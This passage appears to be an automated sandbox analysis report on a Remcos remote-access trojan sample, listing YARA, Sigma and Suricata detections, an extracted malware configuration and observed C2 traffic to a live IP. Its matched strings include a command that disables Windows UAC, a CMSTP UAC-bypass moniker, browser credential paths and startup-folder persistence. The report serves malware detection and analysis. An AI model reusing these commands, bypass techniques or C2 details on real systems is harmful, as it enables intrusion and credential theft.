2.2.Graff.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
10.2.Graff.exe.4010000.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.Graff.exe.4010000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.Graff.exe.4010000.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.Graff.exe.4010000.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ef8:$a1: Remcos restarted by watchdog! 0x6a470:$a3: %02i:%02i:%02i:%03i
10.2.Graff.exe.4010000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x64194:$str_a1: C:\Windows\System32\cmd.exe 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64204:$str_b2: Executing file: 0x6503c:$str_b3: GetDirectListeningPort 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64b80:$str_b7: \update.vbs 0x6422c:$str_b9: Downloaded file: 0x64218:$str_b10: Downloading file: 0x642bc:$str_b12: Failed to upload file: 0x65004:$str_b13: StartForward 0x65024:$str_b14: StopForward 0x64ad8:$str_b15: fso.DeleteFile " 0x64a6c:$str_b16: On Error Resume Next 0x64b08:$str_b17: fso.DeleteFolder " 0x642ac:$str_b18: Uploaded file: 0x6426c:$str_b19: Unable to delete: 0x64aa0:$str_b20: while fso.FileExists(" 0x64749:$str_c0: [Firefox StoredLogins not found]
10.2.Graff.exe.4010000.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64080:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64010:$s1: CoGetObject 0x64024:$s1: CoGetObject 0x64040:$s1: CoGetObject 0x6dc70:$s1: CoGetObject 0x63fd0:$s2: Elevation:Administrator!new:
2.2.Graff.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
2.2.Graff.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
2.2.Graff.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.Graff.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
2.2.Graff.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
2.2.Graff.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
10.2.Graff.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.Graff.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.Graff.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.Graff.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
10.2.Graff.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
10.2.Graff.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
2.2.Graff.exe.3bf0000.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
2.2.Graff.exe.3bf0000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
2.2.Graff.exe.3bf0000.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.Graff.exe.3bf0000.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ef8:$a1: Remcos restarted by watchdog! 0x6a470:$a3: %02i:%02i:%02i:%03i
2.2.Graff.exe.3bf0000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x64194:$str_a1: C:\Windows\System32\cmd.exe 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64204:$str_b2: Executing file: 0x6503c:$str_b3: GetDirectListeningPort 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64b80:$str_b7: \update.vbs 0x6422c:$str_b9: Downloaded file: 0x64218:$str_b10: Downloading file: 0x642bc:$str_b12: Failed to upload file: 0x65004:$str_b13: StartForward 0x65024:$str_b14: StopForward 0x64ad8:$str_b15: fso.DeleteFile " 0x64a6c:$str_b16: On Error Resume Next 0x64b08:$str_b17: fso.DeleteFolder " 0x642ac:$str_b18: Uploaded file: 0x6426c:$str_b19: Unable to delete: 0x64aa0:$str_b20: while fso.FileExists(" 0x64749:$str_c0: [Firefox StoredLogins not found]
2.2.Graff.exe.3bf0000.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64080:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64010:$s1: CoGetObject 0x64024:$s1: CoGetObject 0x64040:$s1: CoGetObject 0x6dc70:$s1: CoGetObject 0x63fd0:$s2: Elevation:Administrator!new:
Click to see the 43 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs" , ProcessId: 8160, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs" , ProcessId: 8160, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\misruling\Graff.exe, ProcessId: 7792, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\misruling\Graff.exe, ProcessId: 7792, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET MALWARE Remcos 3.x Unencrypted Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:17:41.826277+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.10	49735	192.210.150.26	3678	TCP

ET MALWARE Remcos 3.x Unencrypted Server Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:17:42.299639+0100	2032777	1	Malware Command and Control Activity Detected	192.210.150.26	3678	192.168.2.10	49735	TCP
2025-01-10T19:20:00.542376+0100	2032777	1	Malware Command and Control Activity Detected	192.210.150.26	3678	192.168.2.10	49735	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:17:44.120251+0100	2803304	3	Unknown Traffic	192.168.2.10	49747	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: bwYw3UUfy7.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Avira: detection malicious, Label: HEUR/AGEN.1319493

Found malware configuration

Source: 0000000A.00000002.1512004348.0000000001800000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: bwYw3UUfy7.exe	Virustotal: Detection: 71%			Perma Link
Source: bwYw3UUfy7.exe	ReversingLabs: Detection: 71%

Yara detected Remcos RAT

Source: Yara match	File source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512004348.0000000001800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512067851.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742200171.000000000406E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3740170778.0000000001401000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3741371682.000000000149E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: bwYw3UUfy7.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		2_2_0043293A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		10_2_0043293A

Source: Graff.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 1436, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00406764 _wcslen,CoGetObject,		2_2_00406764
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00406764 _wcslen,CoGetObject,		10_2_00406764

Source: bwYw3UUfy7.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_0079DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0079DBBE
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	2_2_0040B335
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	2_2_0041B42F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	2_2_0040B53A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0044D5E9 FindFirstFileExA,	2_2_0044D5E9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	2_2_004089A9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00406AC2 FindFirstFileW,FindNextFileW,	2_2_00406AC2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	2_2_00407A8C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	2_2_00418C69
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	2_2_00408DA7
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_100010F1
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_10006580 FindFirstFileExA,	2_2_10006580
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,	4_2_0040AE51
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	6_2_00407EF8
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	7_2_00407898
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	10_2_0040B335
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	10_2_0041B42F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	10_2_0040B53A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0044D5E9 FindFirstFileExA,	10_2_0044D5E9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	10_2_004089A9
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00406AC2 FindFirstFileW,FindNextFileW,	10_2_00406AC2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	10_2_00407A8C
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	10_2_00418C69
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	10_2_00408DA7

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

2_2_00406F06

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49735 -> 192.210.150.26:3678
Source: Network traffic	Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.26:3678 -> 192.168.2.10:49735

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 150.26

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 192.210.150.26 192.210.150.26
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49747 -> 178.237.33.50:80

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_0040455B WaitForSingleObject,SetEvent,recv,

2_2_0040455B

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Graff.exe, 00000002.00000002.3743546633.00000000073D0000.00000040.10000000.00040000.00000000.sdmp, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: Graff.exe, 00000004.00000003.1396465346.00000000018ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Graff.exe, 00000004.00000003.1396465346.00000000018ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Graff.exe, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: Graff.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: Graff.exe, 00000002.00000002.3743279377.00000000072C0000.00000040.10000000.00040000.00000000.sdmp, Graff.exe, 00000004.00000002.1396884825.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: Graff.exe, 00000002.00000002.3743279377.00000000072C0000.00000040.10000000.00040000.00000000.sdmp, Graff.exe, 00000004.00000002.1396884825.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: geoplugin.net

Source: bhv4482.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
